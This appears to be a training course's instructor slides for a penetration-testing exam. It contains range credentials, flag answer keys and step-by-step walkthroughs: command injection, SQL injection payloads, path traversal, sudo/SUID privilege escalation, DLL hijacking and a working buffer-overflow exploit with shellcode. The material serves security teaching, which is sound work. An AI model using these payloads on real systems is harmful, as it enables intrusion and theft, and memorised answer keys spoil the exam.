{
  "auName": "Test",
  "dirPath": "docs/test",
  "slides": [
    {
      "filepath": "docs/test/test.md",
      "slideTitle": "Credientials and Map",
      "type": "markdown",
      "content": "# Practical Exercise Range\n\nOutlined below are the Network Diagrams and Configurations utilized for the Final Practical Exercise within the Security Module\n\n```\nCreds:\nPrimary / PrimaryV2\nLinux\nroot:: GATEwayTOtheKINGdom  # Ext dmz\n       HALLpassFORall       # Int dmz\n       MADEitALLtheWAY      # Internal\n\nWindows:\nadministrator::MADEitALLtheWAY1\n\n```\n\n## PE Range Setup\n\nThe following process will deploy the ranges for all the PE Ranges, it will create Security Groups and iterate through the loop to build the defined number of Ranges\\:\n\nUse CVTE or PCTE deployment build Catalogs for Exams.\n\nEach student will get their own Exam deployment with their unique set of flags.\n\n## Part1\n\nAll students will utilize the SQL NAT to access the credetial server\n`http://<LinPriv_Float>/classinfo.html`\nThey will be provided with the IP for the Ministry\\_Defense system (IE. Target 1)\n\n## Part2\n\nPart 2 will automatically unlock at 1200/1300 EST depending of Daylight Saving Time (DST)\nIf Part 2 needs to be unlocked prior to schedule cron job, the Instructors will need to authenticate to each external facing systmes and flush the iptables or follow the instruction below for scripted options.\n\n:::note{title=\"note\"}\nIf Exam range is built before the scheduled cron job the day prior to the Exam. The scripted option below will allow Instructors to re-enable firewall rules prior to the starting of Part 1.\n\n:::\n\n### Final Practical Exercise (All Versions)\n\nAll exams have a cron job on the External\\_DMZ\\_Webserver that will run at 1200 or 1300 EST ( 1300 during DST ).\n\n<img height=\"300\" src=\"../_images/CVTE_Floating.png\" />\n\n1. Create a file on LinOps with all the floating IPs.\n   1. Example file below.\n      ```\n      10.50.1.1\n      10.50.1.2\n      10.50.1.3\n      ...\n      ```\n2. Create bash script as shown below.\n   1. Full script\n      ```bash\n      #!/bin/bash\n      # Enter floating IPs from CVTE env for external DMZ web server\"\n      # The IPs can be grabbed from the SQL server in the Demo deployment under cloud-config\n      # sshpass will need to be installed on LinOps\n      # DO NOT SHARE THIS SCRIPT WITH STUDENTS !!!!!!\n      echo \"Provide full path to file containing floating IPs   ????\"\n      read IPs\n      echo \"Enter 'enable' or 'disable' iptables \"\n      read action\n      for line in $(cat \"$IPs\");\n      do\n      if [[ \"${action,,}\" == \"disable\" ]]; then\n          echo \"disabling iptables\"\n          sshpass -p 'GATEwayTOtheKINGdom' ssh -o \"ConnectTimeout=10\" -o \"UserKnownHostsFile=/dev/null\" -o \"StrictHostKeyChecking=no\" root@\"$line\" \"iptables -F\"\n      else\n          echo \"enabling iptables\"\n          sshpass -p 'GATEwayTOtheKINGdom' ssh -o \"ConnectTimeout=10\" -o \"UserKnownHostsFile=/dev/null\" -o \"StrictHostKeyChecking=no\" root@\"$line\" \"iptables -A OUTPUT --dst 192.168.28.0/27 -j REJECT\"\n      fi\n      done\n      ```\n\n<img src=\"../_images/Dry-Run.svg\" alt=\"PE-Dry-Run\" height=\"500\"/>\n"
    },
    {
      "filepath": "docs/test/solution.md",
      "slideTitle": "Solution",
      "type": "markdown",
      "content": "# Security Exam\n\n- **Length\\:** 6 hours (3hours before lunch, 3 hours after)\n- **Resources** Open Note, Open Internet.  All *Web Communication* sites are prohibited.\n- **Scoring Breakdown**\n  - For the first 3hrs, only the easy and medium tracks are open. The hard track opens during the second 3 hours.\n  - There are 31 questions worth 5 points each.\n    - It takes 110 points to get a ***70%***\n    - It takes 155 points to get a ***100%***\n\n```\nMinistry Defense\nroot ::GATEwayTOtheKINGdom\n\nInternal DMZ (Defense_Nix, DefenseKP )\nroot :: HALLpassFORall\n\nInternal Network ( R_and_D_Nix1 / R_and_D_Nix2 )\nroot :: MADEitALLtheWAY\n\nR_and_D_Win\nadministrator :: MADEitALLtheWAY1\n```\n\n## Part 1\n\n## Ministry-defense\n\n### Web directories\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** How many web directories does the server host from its home directory?\n  - **Flag\\:** 5\n  - **Value\\:** 5 points\n\n### Kernel version\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What is the kernel version of Ministry-defense?\n  - **Flag\\:** 4.15.0-72-generic\n  - **Value\\:** 5 points\n\n### Network Map\n\n- **Category\\:** Reconnaissance\n  - **Question\\:** Find the network map on the server, provide the flag that is in the file.\n  - **Flag\\:** FFcy67MnQaE33rt8JNm1\n  - **Value\\:** 5 points\n\n### Vulnerable input field\n\n- **Category\\:** Web Exploitation\n  - **Question\\:** Which input field is vulnerable to web exploitation?\n  - **Flag\\:** Select story to read, or Select story to read\\:\n  - **Value\\:** 5 points\n\n### Mr. President\n\n- **Category\\:** Reconnaissance\n  - **Question\\:** What is the middle name of the Gorgas President?\n  - **Flag\\:** random 20 characters\n    - read \"Possible\\_end.txt\" from stories web page\n  - **Value\\:** 5 points\n\n### Shell\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What is the comment for the user that is configured to use a system shell, which has not been bourne again?\n  - **Flag\\:** random 20 characters\n    - read /etc/passwd file on Ministry\\_Defense system\n  - **Value\\:** 5 points\n\n:::note{title=\"Ministry-Defense Walkthrough\" collapse=\"closed\"}\nRecon float address\\:\n\n```bash\nsudo nmap -Pn -sS -T5 <float IP>\n```\n\n- See that 22 and 80 are open.\n\n- Enum webserver for additional information.\n\n```bash\nnmap -Pn -sS -T5 -script http-enum.nse <float IP>\nnc <float IP> 22\n```\n\n- See that robots.txt, images, and share directories are found.\n\n- See that server is apache/2.4.29 (ubuntu).\n\n- System is run ssh-2.0-OpenSSH\\_7.6p1 Ubuntu-4ubuntu0.3.\n\n- Browse to\n\n```html\n<float IP>/robots.txt\n```\n\n- See /Onlinetools.\n\n- Browse to\n\n```html\n<float IP>/Onlinetools\n```\n\nSee tools.php and click it.\n\n - tools.php\n\n```text\n1. Test input field for vulnerability.\n2. The \"select story to read\" vuln to command injection.\n3. from vulnerable field  \n    - ; ls -al /var/www/html\n    - Identify 5 main directory \n        - Onlinetools \n\n        - images \n\n        - newtest \n\n        - share \n\n        - stories \n\n4. enum newtest from injection \n\n    - ls -al /var/www/html/newtest\n    - ls -al /var/www/html/newtest/test\n    - ls -al /var/www/html/newtest/test/automation\n    - zip file inside automation..\n    - browse to <float IP>/newtest/test/automation\n    - click the Automation_test zip to download\n    - extract the zip file\n    - A user name and password are base64 encoded inside (name and sec variables)\n5. enum share\n    - ls -al /var/www/html/share\n    - browse to <float IP>/share and click the Untitled_Diagram.png\n    - Diagram has the network ranges and associated flag \n6. enum stories/use the page\n    - Page is set to display the 2 articles in the stories directory. Inside Possible_end.txt article the President’s middle name is identified.\n```\n\nGaining Access\n\n- Two ways\\:\n\n 1. If student found the automation zip and unencoded the name and sec variables they can use that account to ssh into.\n\n 2. Through command injection on \"select story to read\".\n\n```bash\n  ; mkdir /var/www/.ssh\n  ; echo 'their ssh key' > /var/www/.ssh/authorized_keys\n  ssh www-data@&lt;float IP>\n```\n\nMoving into the network\n\nDiagram in /share identifies the 192.168.28.0/27 and .160/27 networks. Access now with ether openupthedoor or www-data student conduct scans.\n\n```bash\nssh www-data@10.50.24.150 -D 9050\n```\n\nDirty ping sweep from ministry-defense system to see what is alive.\n\n```bash\nfor i in {1..254} ;do (ping -c 1 192.168.28.$i | grep \"bytes from\" &) ;done\n```\n\n```bash\nproxychains nmap -sT -Pn -T5 <IPs>\n```\n\nSee that .30, .177, and .182 all repsond with ether 22 or 80 open. the .30 is the vyos router and out of play.\n\nPivot through\n\nWindows station\\:\n\n```bash\nssh www-data@10.50.24.150 -L 8000:192.168.28.182:80 -L 2200:192.168.28.177:22  -L 2300:192.168.28.182:22 \n```\n\n<strong>NOTE \\:\\: Port 2300 is insturctor login to Defense\\_KP</strong>\n\n:::\n\n## Defense-KP\n\n### Databases\n\n- **Category\\:** SQL Injection\n  - **Question\\:** How many databases does the server house?\n  - **Flag\\:** 5 or five\n  - **Value\\:** 5 points\n\n### Commander\n\n- **Category\\:** SQL Injection\n  - **Question\\:** Who is the commander of the 58th Army?\n  - **Flag\\:** Vasili Adadurov\n  - **Value\\:** 5 points\n\n### Troops\n\n- **Category\\:** SQL Injection\n  - **Question\\:** How many soldiers are on hand for the 31st Fighter Regiment?\n  - **Flag\\:** 2350\n  - **Value\\:** 5 points\n\n### Money (HIDDEN)\n\n- **Category\\:** SQL Injection\n  - **Question\\:**  How much does an Armor unit cost?\n  - **Flag\\:** 5000000\n  - **Value\\:** 5 points\n\n### Names\n\n- **Category\\:** SQL Injection\n  - **Question\\:** The database has user accounts configured, identify one of the users full name.\n  - **Flag\\:** Rick Sanchez, Morty Smith, Frank Palicky, Krombopulos Michael\n  - **Value\\:** 5 points\n\n### DNS\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What information of interest can be found associated to DNS translations?\n  - **Flag\\:** random 20 characters\n    - read /etc/hosts file from \"Onlinetools/tools.php\" page\n  - **Value\\:** 5 points\n\n:::note{title=\"Defense-KP Walkthrough\" collapse=\"closed\"}\n1. browse localhost\\:8000\n\n2. Landing page there is a refer to /forces/forcesreport.html\n\n3. robots.txt and see /Onlinetools and /login\n\nforcesreport.html\n\n1. Dropdown box with 10 options, legit selection will show in the URL that Locations= is the variable being passed to the server. Looking at the page source will show that GET method is being used to pass the variable.\n\n2. Student should test each number with a blind inject to determine which 2 options are injectable (4th and 6th options are injectable)\n\n - Blind inject example\n\n```bash\n/forces/forcespick.php?Locations=1 and 1=1\n```\n\nEnum the database\\:\n\nList databases\n\n```html\n/forcespick.php?Locations=6 union SELECT 1,2,3,schema_name FROM information_schema.schemata\n```\n\n- auth\\_user, forces, information\\_schema, mysql, performance\\_schema\n\nList tables\n\n```html\nforcespick.php?Locations=6 UNION SELECT 1,table_name,3,4 from information_schema.tables where table_schema=database()\n```\n\n- commanders, locations, unit\\_type, units\n\nList columns by table\n\n```html\n/forcespick.php?Locations=6UNION SELECT 1,2,3,column_name FROM information_schema.columns WHERE table_name='commanders'\n/forcespick.php?Locations=6UNION SELECT 1,2,3,column_name FROM information_schema.columns WHERE table_name='units'\n/forcespick.php?Locations=6 UNION SELECT * FROM units #(doesn't work for all tables since some have less than 4 columns)\n```\n\nList commanders\n\n```html\n/forcespick.php?Locations=6 UNION SELECT * FROM commanders\n/forcespick.php?Locations=6 UNION SELECT name,unit, 3,4 FROM commanders\n```\n\nList unit on\\_hand\n\n```html\n/forcespick.php?Locations=6 UNION SELECT on_hand,unit, 3,4 FROM units\n/forcespick.php?Locations=4 UNION SELECT * FROM units\n```\n\nFind the cost of units\n\n```html\n/forcespick.php?Locations=6 UNION SELECT type,cost,3,4 from unit_type\n```\n\n*Login page*\n\nFind through robots.txt or button on /forcesreport.html\n\nDump creds\n\n```raw\nIn both loggin name and password fields input ' or 1='1\n```\n\n- Success will show 3 of 4 users.\n\nFrom /forces\n\n```html\n/forcespick.php?Locations=6 union select name,password,1,2 from auth_users.logins\n```\n\n- Success will show 4 of users\n\nDirectory Transversal\n\nFind in robots.txt that points to /Onlinetools\n\nFind flag in /etc/hosts\n\n```html\nURL: /Onlinetools/lookup.php?myfile=../../../../../etc/hosts\nFile to read field: ../../../../../etc/hosts\n```\n\n- Inside hosts file is a flag \"random 20 characters\" and IP to 3rd system in Part one of the PE\n\n - 172.16.0.0 random 20 characters\n\n - 192.168.28.177 Defense\\_Nix1\n\n:::\n\n## Defense\\_Nix1\n\n### Priv binary\n\n- **Category\\:** Linux Exploitation\n  - **Question\\:** What binary allowed for privilege escalation?\n  - **Flag\\:**  xargs\n  - **Value\\:** 5 points\n\n### Root of it all\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What flag resides at root?\n  - **Flag\\:** random 20 characters\n    - Gain root access and read file at \"/root/Important.txt\"\n  - **Value\\:** 5 points\n\n### Script\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What is the reference number of the script caused the abnormal port to run?\n  - **Flag\\:** random 20 characters\n    - Read one of 2 scripts /root/svch0st.sh or /usr/share/.svchost.sh\n  - **Value\\:** 5 points\n\n### Port\n\n- **Category\\:** Reconnaissance\n  - **Question\\:** What abnormal port is running?\n  - **Flag\\:** 21254\n  - **Value\\:** 5 points\n\n### Portable executable (HIDDEN)\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What portable executable resides on the system? Can be found in RE challenge if not on system.\n  - **Flag\\:** RE\\_this\n  - **Value\\:** 5 points\n\n### RE (HIDDEN)\n\n- **Category\\:** Binary Analysis\n  - **Question\\:** How many numbers are required to have the only portable executable on the system print \"Congrats\"?\n  - **Flag\\:** 3\n  - **Value\\:** 5 points\n\n### Range of possible numbers\n\n- **Category\\:** Binary Analysis\n  - **Question\\:** What could one use for the first number to get the only portable executable on the system to print \"Congrats\"?\n  - **Flag\\:** 84,85 or 87\n  - **Value\\:** 5 points\n\n### Mutating (HIDDEN)\n\n- **Category\\:** Binary Analysis\n  - **Question\\:** Which assembly instruction is mutating numbers in the only portable executable on the system?\n  - **Flag\\:** shl, shift, or shr\n  - **Value\\:** 5 points\n\n:::note{title=\"Defense_Nix1 Walkthrough\" collapse=\"closed\"}\n```text\n1. Cred reuse from Defense_KP DB : Fpalic:Birdperson\\\n2. Gain root:\n    * enum show find that xargs is set to sudo by doing sudo -l\n    * sudo xargs -a /dev/null sh\n    * ls -al /root will show the Important.txt that holds the flag\n3. netstat -antu will show port 18999 runing question will ask student which script start abnormal port to run\n    * cat /etc/crontab will show \n      * * * * * * root /bin/bash /root/svch0st.sh           -> (script start nc, but we removed it and renamed to SecurityOnion &lt;-- flag inside)\n      * * * * * * root /bin/bash /usr/share/.svchost.sh    -> (correct script, it is nc renamed to SecurityOnion &lt;-- flag inside)\n      * * * * * * root /bin/bash /etc/svch2st.py            -> (script start a tcp port on 123, which is NTP and not a abnormal port)\n      * * * * * * root /bin/bash /root/.hidden/svchost5.sh  -> (script that greps out the abnormal port, meant to help lead them to the port we want)\n    * They can also do ps -elf and follow the PID to PPID.\n4. Students should enum /home and see a /devops dir, inside will be the report the svchost5.sh produces and the .exe for them to pull back for RE. /devops is set with 757 so they will be able to pull back the exe to their stations without having to gain root.\n```\n\n:::\n\n## Part 2\n\n#### Setup\n\n- In CVTE, iptables rules will be flushed at 1200 or 1300 depending on Daylight Savings.\n- Part2 Notification title should be sent out in CTFd\n- Students will be given account creds for this part.\n- Students will also recieve a Windows exe to use for priv esc.\n\n#### Identify systems\n\nStudents should scan from ministry-defense into next CIDR network; 192.168.28.0/27.\n\n- dirty ping sweep from ministry-defense system and htna nmap live hosts.\n\n```bash\nfor i in {1..127} ;do (ping -c 1 192.168.28.$i | grep \"bytes from\" &) ;done\n\nnmap -sT -Pn -T5 <IPs>\n```\n\n- Student should see the .5, .10, .19 responsd with either 22 or 3389 open.\n\n#### Movement set up\n\n```bash\nssh openupthedoor@10.50.20.209 -L 33890:192.168.28.5:3389  -L 3200:192.168.28.19:22 -L 3300:192.168.28.10:22 -L 3400:192.168.28.5:22\nopenupthedoor : B12c3b34f (def min)\n\nxfreerdp /v:localhost:33890 /u:Rsanch /p:ScaryTerry \n\nssh -p 3200 Msith@localhost\nMsmith:Squanchy \n\nssh -p 3300 Kmichae@localhost\nKmichae:MrMeeseeks\n\nssh -p 3300 root@localhost\nOnly Instructos\n```\n\n## R\\_and\\_D\\_Nix1\n\n### Something is watching\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** Which running process could cause alarm to a person attempting to remain stealthy?\n  - **Flag\\:** rsyslogd\n  - **Value\\:** 5 points\n\n### How is it set up\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** A process that may cause an alarm, is configured to send data to an IP. The flag is written within the comments.\n  - **Flag\\:** 20 random characters\n    - read /etc/rsyslog.conf\n  - **Value\\:** 5 points\n\n### Root of it all\n\n- **Category\\:** Linux Exploitation\n  - **Question\\:** What is inside the file located in roots directory?\n  - **Flag\\:** random 20 characters\n    - read file /root/secretmessage after Priv Esc is complete\n  - **Value\\:** 5 points\n\n### Priv Esc\n\n- **Category\\:** Linux Exploitation\n  - **Question\\:** What binary was used to escalate?\n  - **Flag\\:** nice\n  - **Value\\:** 5 points\n\n### Passwords\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** Identify any files that could contain passwords?\n  - **Flag\\:** 20 random characters\n    - read /lib/libhanbles/Passwords.txt\n  - **Value\\:** 5 points\n\n:::note{title=\"R_and_D_Nix1 Walkthrough\" collapse=\"closed\"}\nGain access through pivot using Msith\\:Squanchy creds\n\nOnce on sutdent should enum system.\n\n*Find rsyslog*\n\n```bash\nnetstat -antu\n```\n\n- Should see system listening on TCP 514 which is syslog (quick search will tell them)\n\n```bash\nps -elf | grep syslog\n```\n\n- see that rsyslog is running\n\n```bash\ncat /etc/rsyslog.conf\n```\n\n- see that rsyslog is configured as a server with IP 192.168.28.199 as allowed to send its logs to the server\n\n*Find SUID, move up, and the flag*\n\n```bash\nfind / -perm /4000 -type f 2>/dev/null -exec ls -l {} \\;\n```\n\n- In the list should see nice is set with SUID\n\n```bash\nnice /bin/sh -p\nls -al /root\nls -al /root/home\ncat /root/home/secretmessage\n```\n\n*Find password files*\n\n```bash\nfind / -iname *password*.txt 2>/dev/null\ncat /lib/libhanble/Passwords.txt\n```\n\n- Student should see that password.txt is from a abnormal directory.\n\n:::\n\n## R\\_and\\_D\\_Nix2\n\n### User\n\n- **Category\\:** Reconnaissance\n  - **Question\\:** What message ID that was provided by the banner after access to the system was accomplished?\n  - **Flag\\:** random 20 characters\n    - Authenticate and flag will appear in message.\n  - **Value\\:** 5 points\n\n### Run as someone else\n\n- **Category\\:** Linux Exploitation\n  - **Question\\:** What program can be run at an elevated privilege level by the user you landed onto the box as?\n  - **Flag\\:** exploit\\_this\n  - **Value\\:** 5 points\n\n### Calling things (HIDDEN)\n\n- **Category\\:** Binary Analysis\n  - **Question\\:** How many directives are configured in the vulnerable binary?\n  - **Flag\\:** (sudio.h, string.h, stdlib.h)\n  - **Value\\:** 5 points\n\n### Function\n\n- **Category\\:** Exploit Development\n  - **Question\\:** What is the vulnerable function in the binary that can be run with elevated privileges by your user?\n  - **Flag\\:** strcpy\n  - **Value\\:** 5 points\n\n### Characters\n\n- **Category\\:** Exploit Development\n  - **Question\\:** How many characters are required in the buffer to overwrite the EIP?\n  - **Flag\\:** 38\n  - **Value\\:** 5 points\n\n### Secret\n\n- **Category\\:** Exploit Development\n  - **Question\\:** What is inside the file located at /root/home/secretmessage?\n  - **Flag\\:** random 20 characters\n    - read file with local linux buffer overflow\n  - **Value\\:** 5 points\n\n:::note{title=\"R_and_D_Nix2 Walkthroug\" collapse=\"closed\"}\nsetup for EB (compile binary on target system for test)\n\n- python3 has issue with encode NOP sled, it encodes as UT-8, so sled will have hex code of 90c2 vs 90\n\n- student must recoginze that the file is involved with sudo so when they test the file they should run it as sudo\n\n```bash\necho 0 | sudo tee /proc/sys/kernel/randomize_va_space\napt-get install gdb -y\napt-get install gcc-multilib -y\ngit clone https://github.com/longld/peda.git ~/peda\necho \"source ~/peda/peda.py\" >> ~/.gdbinit\necho \"DONE! debug your program with gdb and enjoy\"\ngcc -m32 -fno-stack-protector -z execstack -no-pie eb_source.c -o exploit_me\n```\n\nExploit dev on system\n\n```bash\nsudo gdb -q exploit_this\n\ndisas main\n\n# 0x080484d5 <+79>:\tcall   0x80484ec <test>  <----function call of test\n\ndisas test\n#  0x08048508 <+28>:\tcall   0x8048330 <strcpy@plt>  <---vuln buffer\n\nr $(python2.7 -c 'import sys;sys.stdout.write(\"A\"*100)')  #COMMENT seg fault, find EIP\n\nr $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*44)+(\"B\"*4))') #COMMENT EIP has our 4 B's, we need 44 characters to get to it\n\nr $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*38)+(\"B\"*4)+(\"C\"*55))') #COMMENT how many bytes we have for our shell code \n\nr $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*38)+(\"B\"*4)+(\"\\x90\"*32)+(\"C\"*23))')  #padd with NOP to get EIP to point to our C's, grab ESP addres\ndisas test  #COMMENT grab out EIP (ret address)\n\nb * 0x08048527  #COMMENT set break pt at EIP\n\nr $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*38)+(\"\\x70\\xd5\\xff\\xff\")+(\"\\x90\"*32)+(\"C\"*23))') \n\nr $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*38)+(\"\\x50\\xd6\\xff\\xff\")+(\"\\x90\"*32)+(\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"))')\n\nsudo ./exploit_this $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*38)+(\"\\x50\\xd6\\xff\\xff\")+(b\"\\x90\"*32)+(\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"))')   \n#COMMENT have to play with the memory location outside of gdb.  Our locate in gdb was \\x70\\xd5\\xff\\xff, outside gdb \\x90\\xd5\\xff\\xff  will give us our shell\n```\n\n <strong>OR</strong>\n\nExploit.py\n\n```python\n#!/usr/bin/python\nbuffer = '\\x41' * 38\nEIP = \"\\x50\\xd6\\xff\\xff\"\nnop = '\\x90' * 32\nbuf = b\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\nprint(buffer + EIP + nop + buf)\n```\n\n<strong>NOTE \\:\\: If students do not run sudo with gdb or to throw the exploit they will have the incorrect memory addresses.</strong>\n\n:::\n\n## R\\_and\\_D\\_Win1\n\n### Policies\n\n- **Category\\:** Windows Exploitation\n  - **Question\\:** How many security policies are set to log for both successful and failed events?\n  - **Flag\\:** 3\n  - **Value\\:** 5 points\n\n### Persistence\n\n- **Category\\:** Winodws Exploitation\n  - **Question\\:** What file is being used in an attempt to have persistence?\n  - **Flag\\:** kpersky\\_start.ps1\n  - **Value\\:** 5 points\n\n### Called program\n\n- **Category\\:** Windows Exploitation\n  - **Question\\:** Based on the file that is being used for persistence, a program is being called. What is the document number in the file that identifies the program?\n  - **Flag\\:** random 20 characters\n    - read kpersky\\_start.ps1 file\n  - **Value\\:** 5 points\n\n### User file\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** One of the users directories has a file that will provide a flag.\n  - **Flag\\:** randon 20 characters\n    - read file in Wantme user directory \"C\\:\\users\\Wantme\\file.txt\"\n  - **Value\\:** 5 points\n\n### Logging (HIDDEN)\n\n- **Category\\:** Which command line interface tool is set for logging?\n  - **Question\\:** Windows Exploitation\n  - **Flag\\:** WMIC, WMI, wbem\n  - **Value\\:** 5 points\n\n### Home of Admin\n\n- **Category\\:** Windows Exploitation\n  - **Question\\:** What flag resides in Administrator’s home?\n  - **Flag\\:** random 20 characters\n    - read file at \"C\\:\\users\\Admin\\message.txt\"\n  - **Value\\:** 5 points\n\n:::note{title=\"R_and_D_Win1 Walkthrough\" collapse=\"closed\"}\n*Identify which CLI tool is logging*\n\n```bat\nreg query hklm\\software\\microsoft\\wbem\\cimom | findstr /i logging\n```\n\n- will see that wmic is set to logging errors.\n\n*Find persistence*\n\n```bat\nreg query HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows_updater\n```\n\n- will see that C\\:\\Program Files\\scripts\\kpersky\\_start.ps1 is being called\n\n*Find what exe is being called in the file inside the run key*\n\n```bat\ntype C:\\Program Files\\scripts\\kpersky_start.ps1\n```\n\n- will see that svh0st.exe is being started through powershell\n\n*Find flag in user directory*\n\n```bat\ndir /ah c:\\users\ntype c:\\users\\wante\\file.txt\n```\n\n- will see that Wantme directory is hidden, inside is a file with the flag which is base64 encoded\n\n- use online base64 decode to get the flag.\n\n* student will have to priv esc to gain access\n\n*Admins flag and security policy setting*\n\n```bat\nauditpol /get /category:* | findstr /i \"success failure\"\n```\n\n*Flag in Admins users dir*\n\n- Once priv esc is done student can just go into Admins folder and grab the flag in the message file\n\nPossible priv esc areas\n\n1. Putty.exe is being call through a system schtasks every minute.\n\n - Putty folder is writable by the USER group, student can do a dll hijack by naming their dll ntmarta.dll. Than wait for the schtasks to start.\n\n2. C\\:\\MsEdge\\DL\\7zip.exe is able to be written over, we give students moveup.exe which will create a admin user hack \\: pass123 in the RDP group\n\n:::\n"
    },
    {
      "filepath": "docs/test/solutionV2.md",
      "slideTitle": "V2 Solution",
      "type": "markdown",
      "content": "# Security Exam\n\n### Below script on PE server should run to update challenges.\n\nCTFd Q\\&A change script\n\n```bash\n#!/bin/bash\n\n\nversion=\"$1\"\n\n\nif [$1 == \"Img_PE-primaryV2.yaml\"]; then\n\n        ##challenge Commander id 10\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update challenges SET Description = 'Who is the commander of the 3rd MLRS Regiment?' where id = 10;\"\n        ###update answer###\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update flags SET content = 'Adam Balla' where challenge_id = 10;\"\n\n\n        ##Challenge Troops  id 11\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update challenges SET Description = 'How many soldiers are on hand for the 10th Armored Division?' where id = 11;\"\n        ##update answer\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update flags SET content = '4675' where challenge_id = 11;\"\n\n        ##challenge Priv Binary Nix1\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update flags SET content = 'env' where challenge_id = 15;\"\n\n        ##challenge Prive Esc R_and_D_Nix1\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update flags SET content = 'watch' where challenge_id = 26;\"\nelse\n        ##challenge Commander id 10\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update challenges SET Description = 'Who is the commander of the 58th Army?' where id = 10;\"\n        ###update answer###\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update flags SET content = 'Vasili Adadurov' where challenge_id = 10;\"\n\n\n        ##Challenge Troops  id 11\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update challenges SET Description = 'How many soldiers are on hand for the 31st Fighter Regiment?' where id = 11;\"\n        ##update answer\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update flags SET content = '2350' where challenge_id = 11;\"\n\n        ##challenge Priv Binary Nix1\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update flags SET content = 'xargs' where challenge_id = 15;\"\n\n        ##challenge Prive Esc R_and_D_Nix1\n        docker exec ctfd_db_1 mysql -s -uroot -pctfd -e \"USE ctfd; update flags SET content = 'nice' where challenge_id = 26;\"\nfi\n```\n\n- **Length\\:** 6 hours (3hours before lunch, 3 hours after)\n- **Resources** Open Note, Open Internet. All *Web Communication* sites are prohibited.\n- **Scoring Breakdown**\n  - For the first 3hrs, only the easy and medium tracks are open. The hard track opens during the second 3 hours.\n  - There are 31 questions worth 5 points each.\n    - It takes 110 points to get a ***70%***\n    - It takes 155 points to get a ***100%***\n\n```\nMinistry Defense\nroot ::GATEwayTOtheKINGdom\n\nInternal DMZ (Defense_Nix, DefenseKP )\nroot :: HALLpassFORall\n\nInternal Network ( R_and_D_Nix1 / R_and_D_Nix2 )\nroot :: MADEitALLtheWAY\n\nR_and_D_Win\nadministrator :: MADEitALLtheWAY1\n```\n\n## Part 1\n\n## Ministry-defense\n\n### Web directories\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** How many web directories does the server host from its home directory?\n  - **Flag\\:** 5\n  - **Value\\:** 5 points\n\n### Kernel version\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What is the kernel version of Ministry-defense?\n  - **Flag\\:** 4.15.0-72-generic\n  - **Value\\:** 5 points\n\n### Network Map\n\n- **Category\\:** Reconnaissance\n  - **Question\\:** Find the network map on the server, provide the flag that is in the file.\n  - **Flag\\:** FFcy67MnQaE33rt8JNm1\n  - **Value\\:** 5 points\n\n### Vulnerable input field\n\n- **Category\\:** Web Exploitation\n  - **Question\\:** Which input field is vulnerable to web exploitation?\n  - **Flag\\:** Select story to read, or Select story to read\\:\n  - **Value\\:** 5 points\n\n### Mr. President\n\n- **Category\\:** Reconnaissance\n  - **Question\\:** What is the middle name of the Gorgas President?\n  - **Flag\\:** random 20 characters\n  - **Value\\:** 5 points\n\n### Shell\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What is the comment for the user that is configured to use a system shell, which has not been bourne again?\n  - **Flag\\:** random 20 characters\n  - **Value\\:** 5 points\n\n??? NOTE Ministry-defense Walkthrough\n\n````\nRecon float address:\n```bash\nsudo nmap -Pn -sS -T5 <float IP>\n```\n\n* see that 22 and 80 are open\n\nEnum webserver for additional information\n\n```bash\nnmap -Pn -sS -T5 -script http-enum.nse <float IP>\nnc <float IP> 22\n```\n\n* see that robots.txt, images, and share directories are found\n* see that server is apache/2.4.29 (ubuntu)\n* system is run ssh-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\n\nBrowse to\n```html\n<float IP>/robots.txt\n```\n* see /Onlinetools\n\nBrowse to\n```html\n<float IP>/Onlinetools\n```\n* see tools.php and click it\n\n- tools.php\n\n```\n1. test input field for vulnerability\n2. \"select story to read\" vuln to command injection\n3. from field ; ls -al /var/www/html\n  * Identify 5 main directory:\n    Onlinetools\n    images\n    newtest\n    share\n    stories\n4. enum newtest from injection\\\n    ls -al /var/www/html/newtest\\\n  ls -al /var/www/html/newtest/test\\\n  ls -al /var/www/html/newtest/test/automation\\\n  